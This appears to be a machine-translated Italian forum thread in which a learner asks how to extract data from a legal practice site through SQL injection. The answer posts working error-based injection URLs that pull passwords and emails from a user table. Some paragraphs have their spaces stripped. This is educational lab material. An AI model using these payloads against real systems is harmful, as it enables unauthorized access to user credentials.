Come estrarre i dati dal sito legale di hackyourself con le informazioni su tabelle e colonne?

1

Sto seguendo il tutorial sull'iniezione di Pluralsight SQL. L'istruttore non ha scavalcato effettivamente i dati.

http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'AND 1=(SELECT TOP 1 name from (SELECT top 1 name from sys.tables order by name) t order by name desc)--

Hoprovatoadeseguireleiniezionicome:

http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'unionselectEmailFROMUserProfile--http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'unionselecttop1EmailFROMUserProfile--

Horicevutoquestoerrore:

TuttelequerycombinateutilizzandounoperatoreUNION,INTERSECToEXCEPTdevonoavereunnumerougualediespressionineirispettivielenchididestinazione.

QuindihopensatochefossegiustochelecolonnecorrispondesseroallaqueryCylinders=V12.Credochesarebbeunoodue.Cosìhocambiatolamiarichiestain:

http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12'UNIONSELECTEmail,FirstNameFROMUserProfile;

Horicevutoquestoerrore:

Impossibilerisolvereilconflittodiconfrontotra"Latin1_General_CI_AS" e "SQL_Latin1_General_CP1_CI_AS" nell'operazione UNION.

Come faccio ad estrarre i dati quando ho informazioni su tabelle e colonne?

    
posta Livfe 14.04.2016 - 04:20
fonte

1 risposta

1
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12' AND 1=(select top 1 password from UserProfile where UserId=(select top 1 UserId from(select top 1 UserId from userprofile order by UserId) sq order by UserId DESC))--
http://hackyourselffirst.troyhunt.com/CarsByCylinders?Cylinders=V12' AND 1=(select top 1 Email from UserProfile where UserId=(select top 1 UserId from(select top 1 UserId from userprofile order by UserId) sq order by UserId DESC))--

Ho trovato la soluzione. Ora SO che cos'è SQL Injection basato sugli errori.

    
risposta data 14.04.2016 - 05:39
fonte

Leggi altre domande sui tag